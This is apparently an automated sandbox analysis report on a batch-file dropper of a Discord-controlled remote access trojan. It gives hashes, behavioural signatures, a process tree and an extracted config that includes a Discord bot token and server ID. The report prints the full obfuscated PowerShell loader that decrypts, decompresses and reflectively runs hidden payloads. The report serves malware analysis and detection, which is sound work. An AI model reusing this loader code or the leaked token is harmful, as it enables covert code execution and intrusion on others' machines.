Analysis
- max time kernel: 51s
- max time network: 47s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 14-04-2024 19:22
Static task: static1
Behavioral task: behavioral1
  Sample: exploit.exe
  Resource: win10v2004-20240412-en
Behavioral task: behavioral2
  Sample: vscode.bat
  Resource: win10v2004-20240412-en
Errors
General
- Target: vscode.bat
- Size: 274KB
- MD5: 0d8058c9dafb33c14781290f74cff9f5
- SHA1: 505b9ec433f9c26319ad3b06eaed2f9579fb3d1d
- SHA256: 1e938491719616ade4bd63d17be73b26d6856fdca3c1255e99ab004ace719d4b
- SHA512: 886bae7d223072ee04852d9abce1aa05801ad50e6681cb4ed9a784d952e353fdf639713b706af8e1b7019422b32573ba75441e5cb60e5abdff908ad65f090b0b
- SSDEEP: 6144:aaH4va70scVkDAa5t8PL1ZHGoJtaCnK2RU+Xe/L:atR9VKAa5t8PBVdvXTXe/L
Malware Config
Extracted: discordrat
- discord_token: MTIyMjg4ODc4NjY4MjQ1MDAwMA.GrWWth.lufsbZUbCt6RpsyO9yf6mU1zPT_mACVqxKnhtg
- server_id: 1229118384591994951
Signatures
- Discord RAT
  A RAT written in C# using Discord as a C2.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  description               pid   Process         procid_target
  PID 4808 created 616      4808  powershell.exe  5
- Blocklisted process makes network request (8 IoCs)
  flow  pid   Process
  20    4808  powershell.exe
  28    4808  powershell.exe
  31    4808  powershell.exe
  33    4808  powershell.exe
  40    4808  powershell.exe
  41    4808  powershell.exe
  56    4808  powershell.exe
  57    4808  powershell.exe
- Downloads MZ/PE file
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 8 IoCs)
  flow  ioc
  33    discord.com
  40    discord.com
  41    discord.com
  55    raw.githubusercontent.com
  56    raw.githubusercontent.com
  57    discord.com
  27    discord.com
  28    discord.com
- Suspicious use of SetThreadContext (1 IoCs)
  description                           pid   Process         procid_target
  PID 4808 set thread context of 4524   4808  powershell.exe  95
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  4808  powershell.exe
  4808  powershell.exe
  4808  powershell.exe
  4524  dllhost.exe
  4524  dllhost.exe
  4524  dllhost.exe
  4524  dllhost.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description                  pid   Process
  Token: SeDebugPrivilege      4808  powershell.exe
  Token: SeDebugPrivilege      4808  powershell.exe
  Token: SeDebugPrivilege      4524  dllhost.exe
  Token: SeShutdownPrivilege   4808  powershell.exe
- Suspicious use of WriteProcessMemory (41 IoCs)
  description                          pid   Process         procid_target
  PID 4216 wrote to memory of 4808     4216  cmd.exe         87
  PID 4216 wrote to memory of 4808     4216  cmd.exe         87
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4808 wrote to memory of 4524     4808  powershell.exe  95
  PID 4524 wrote to memory of 616      4524  dllhost.exe     5
  PID 4524 wrote to memory of 664      4524  dllhost.exe     7
  PID 4524 wrote to memory of 960      4524  dllhost.exe     12
  PID 4524 wrote to memory of 64       4524  dllhost.exe     13
  PID 4524 wrote to memory of 408      4524  dllhost.exe     14
  PID 4524 wrote to memory of 1040     4524  dllhost.exe     16
  PID 4524 wrote to memory of 1116     4524  dllhost.exe     17
  PID 4524 wrote to memory of 1132     4524  dllhost.exe     18
  PID 4524 wrote to memory of 1180     4524  dllhost.exe     19
  PID 4524 wrote to memory of 1188     4524  dllhost.exe     20
  PID 4524 wrote to memory of 1284     4524  dllhost.exe     21
  PID 4524 wrote to memory of 1316     4524  dllhost.exe     22
  PID 4524 wrote to memory of 1336     4524  dllhost.exe     23
  PID 4524 wrote to memory of 1392     4524  dllhost.exe     24
  PID 4524 wrote to memory of 1440     4524  dllhost.exe     25
  PID 4524 wrote to memory of 1564     4524  dllhost.exe     26
  PID 4524 wrote to memory of 1580     4524  dllhost.exe     27
  PID 4524 wrote to memory of 1636     4524  dllhost.exe     28
  PID 4524 wrote to memory of 1688     4524  dllhost.exe     29
  PID 4524 wrote to memory of 1732     4524  dllhost.exe     30
  PID 4524 wrote to memory of 1760     4524  dllhost.exe     31
  PID 4524 wrote to memory of 1844     4524  dllhost.exe     32
  PID 4524 wrote to memory of 1944     4524  dllhost.exe     33
  PID 4524 wrote to memory of 1956     4524  dllhost.exe     34
  PID 4524 wrote to memory of 2004     4524  dllhost.exe     35
  PID 4524 wrote to memory of 1864     4524  dllhost.exe     36
  PID 4524 wrote to memory of 1876     4524  dllhost.exe     37
  PID 4524 wrote to memory of 2108     4524  dllhost.exe     38
Processes
- [PID 616] C:\Windows\system32\winlogon.exe (cmdline: winlogon.exe)
  - [PID 64] C:\Windows\system32\dwm.exe (cmdline: "dwm.exe")
  - [PID 4524] C:\Windows\System32\dllhost.exe (cmdline: C:\Windows\System32\dllhost.exe /Processid:{5214bf81-d01f-4797-bfe3-8d6ae63db3cc})
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
- [PID 664] C:\Windows\system32\lsass.exe (cmdline: C:\Windows\system32\lsass.exe)
- [PID 960] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM)
- [PID 408] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc)
- [PID 1040] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts)
- [PID 1116] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc)
- [PID 1132] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService)
- [PID 1180] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog)
- [PID 1188] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule)
- [PID 1284] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi)
- [PID 1316] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc)
- [PID 1336] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc)
- [PID 1392] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp)
- [PID 1440] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager)
- [PID 1564] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem)
- [PID 1580] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes)
- [PID 1636] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc)
- [PID 1688] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS)
- [PID 1732] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder)
- [PID 1760] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm)
- [PID 1844] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p)
- [PID 1944] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache)
- [PID 1956] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p)
- [PID 2004] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository)
- [PID 1864] C:\Windows\System32\svchost.exe (cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection)
- [PID 1876] C:\Windows\system32\svchost.exe (cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt)
- [PID 2108] C:\Windows\System32\spoolsv.exe (cmdline: C:\Windows\System32\spoolsv.exe)
- [PID 4216] C:\Windows\system32\cmd.exe (cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vscode.bat")
  - Suspicious use of WriteProcessMemory
  - [PID 4808] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oG29TiHkUBL8raP9jBJGPGJU4GOleBpzsLsSqfKDVCk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z6QiZy5JAMbpfGsz1xHzww=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Gvikg=New-Object System.IO.MemoryStream(,$param_var); $ZCWGG=New-Object System.IO.MemoryStream; $dlrhf=New-Object System.IO.Compression.GZipStream($Gvikg, [IO.Compression.CompressionMode]::Decompress); $dlrhf.CopyTo($ZCWGG); $dlrhf.Dispose(); $Gvikg.Dispose(); $ZCWGG.Dispose(); $ZCWGG.ToArray();}function execute_function($param_var,$param2_var){ $DNmPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqhCK=$DNmPg.EntryPoint; $tqhCK.Invoke($null, $param2_var);}$VBiSq = 'C:\Users\Admin\AppData\Local\Temp\vscode.bat';$host.UI.RawUI.WindowTitle = $VBiSq;$KCldM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VBiSq).Split([Environment]::NewLine);foreach ($ixDfm in $KCldM) { if ($ixDfm.StartsWith(':: ')) { $LKmBs=$ixDfm.Substring(3); break; }}$payloads_var=[string[]]$LKmBs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82